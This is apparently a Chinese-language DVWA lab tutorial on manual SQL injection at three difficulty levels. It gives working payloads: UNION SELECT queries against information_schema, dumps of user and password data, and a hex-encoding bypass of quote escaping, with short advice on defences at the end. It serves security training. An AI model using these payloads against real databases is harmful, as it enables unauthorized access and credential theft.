DVWA 之 SQL Injection-SQL注入

七、SQL Injection-SQL注入#

原理#

SQL注入是指攻击者通过注入恶意的SQL命令，破坏SQL查询语句的结构，从而达到恶意执行SQL语句的目的。

手工注入常规思路

1. 判断是否存在注入，注入是字符型还是数字型
2. 猜解SQL查询语句中的字段数
3. 确定回显位置
4. 获取当前数据库
5. 获取数据库中的表
6. 获取表中的字段
7. 得到数据

１. Low#

漏洞利用

现实攻击场景下，攻击者是无法看到后端代码的，所以下面的手工注入步骤是建立在无法看到源码的基础上。

1.判断是否存在注入，注入是字符型还是数字型

输入1，查询成功

输入1'，返回SQL语法错误

输入1' or '2'='2，查询成功

表明存在字符型注入

2.猜解SQL查询语句中的字段数

输入1′ order by 1 #，查询成功：

输入1′ order by 2 #，查询成功：

输入1′ order by 3 #，查询失败：

说明执行的SQL查询语句中只有两个字段，即这里的First name、Surname

3.确定显示的位置

输入1′ union select 1,2 #，查询成功：

4.获取当前数据库

输入1' union select version(),database() #，查询成功：

说明当前的数据库为dvwa

5.获取数据库中的表

1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#

若出现Illegal mix of collations for operation 'UNION'错误，原因是是union两端的字段的collatie（排序规则）不同，可以下载phpmydamin，解压缩后放到phpstudy/www目录下，在浏览器地址栏输入localhost/phpmyadmin，进入主界面，选择dvwa数据库，在操作栏修改排序规则为utf8_genera_ci即可。

说明数据库dvwa中一共有两个表，guestbook与users。

6.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

说明users表中有8个字段，分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login

7.获取数据

输入1' union select 1,group_concat(user,0x3a,password) from users #，查询成功：

这样就得到了users表中所有用户的user、password的数据

2. Medium#

Medium级别的代码利用mysql_real_escape_string函数对特殊符号进行转义，同时前端页面设置了下拉选择表单，希望以此来控制用户的输入。

漏洞利用

虽然在前端使用了下拉选择菜单，但我们依然可以通过抓包构造请求，提交恶意构造的查询参数。利用Burp修改数据包，绕过防御。

通过Burp抓包发送到Repeater模块，修改id参数的值

查询当前数据库

1 union select version(),database()#

数据库为dvwa

获取数据库中的表

1 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#

说明数据库dvwa中一共有两个表，guestbook与users。

获取表中的字段名，考虑到单引号被转义，可以利用16进制绕过。（'user'）

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

获得字段中的数据

1 union select user, password from users#

可以得到users表中所有用户的user、password的数据

3. High#

High级别的代码只是在SQL查询语句中添加了LIMIT 1，以此控制只输出一个结果

漏洞利用

虽然添加了LIMIT 1，但是我们可以通过#将其注释掉。由于手工注入的过程与Low级别基本一样，直接演示最后一步查询数据。

输入1' union select 1,group_concat(user,0x3a,password) from users #

需要特别提到的是，High级别的查询提交页面与查询结果显示页面不是同一个，也没有执行302跳转，这样做的目的是为了防止一般的sqlmap注入，因为sqlmap在注入过程中，无法在查询提交页面上获取查询的结果，没有了反馈，也就没办法进一步注入。

防护方法#

• 使用预编译语句，绑定变量
• 使用存储过程
• 检查数据类型
• 使用安全函数